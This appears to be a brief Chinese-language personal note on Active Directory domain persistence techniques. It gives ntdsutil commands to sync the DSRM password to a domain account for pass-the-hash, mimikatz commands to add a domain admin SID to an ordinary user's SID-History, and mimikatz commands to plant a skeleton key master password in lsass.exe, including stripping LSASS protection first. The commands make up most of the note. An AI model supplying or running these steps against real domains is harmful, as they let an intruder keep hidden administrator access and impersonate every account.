DSRM

每次修改都需要重置dsrm密碼，本質上dsrm和administrator是一個賬戶。充值後，administrator的NTLMhash將變成你所掌握的賬號的hash值，可以進行PtH

ntdsutil
set dsrm password
重置 DSRM 管理員密碼：sync from domain account ACCOUNTNAME

證明hash值一樣

sid-history

DomainA中的常規使用者帳戶可以包含DomainA 的SID，如果DomainA 的SID用於特權帳戶或組，就可以授予常規使用者帳戶域管理員許可權，而不需要成為域管理員組的成員。

PS>Get-AdUser -Properties SIDHistory,memberof
mimikatz#privilege::debug
mimikatz#sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]
 

如此即可使得CommonUserNAME具備DomainAdmins的SIDHistory，從而具備了許可權，我的實驗環境的確沒有辦法搞定最後一步，說是缺少許可權，繼續研究中ing

skeleton key（萬能鑰匙）

給域內所有賬戶增加一個密碼，統一的，每一個域內賬戶都可以按照這個密碼進行認證，其原理是對lsass.exe進行注入，所以重啟後會失效

#沒有lsass.exe保護的 
mimikatz#privilege::debug
mimikatz#misc::skeleton
#有lsass.exe保護的
"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 新建-DWORD值，名稱為RunAsPPL,數值為00000001就可以保護
"""
mimikatz#!+
mimikatz#!processprotect /process:lsass.exe /remove
mimikatz#misc::skeleton
 

預設的密碼是mimikatz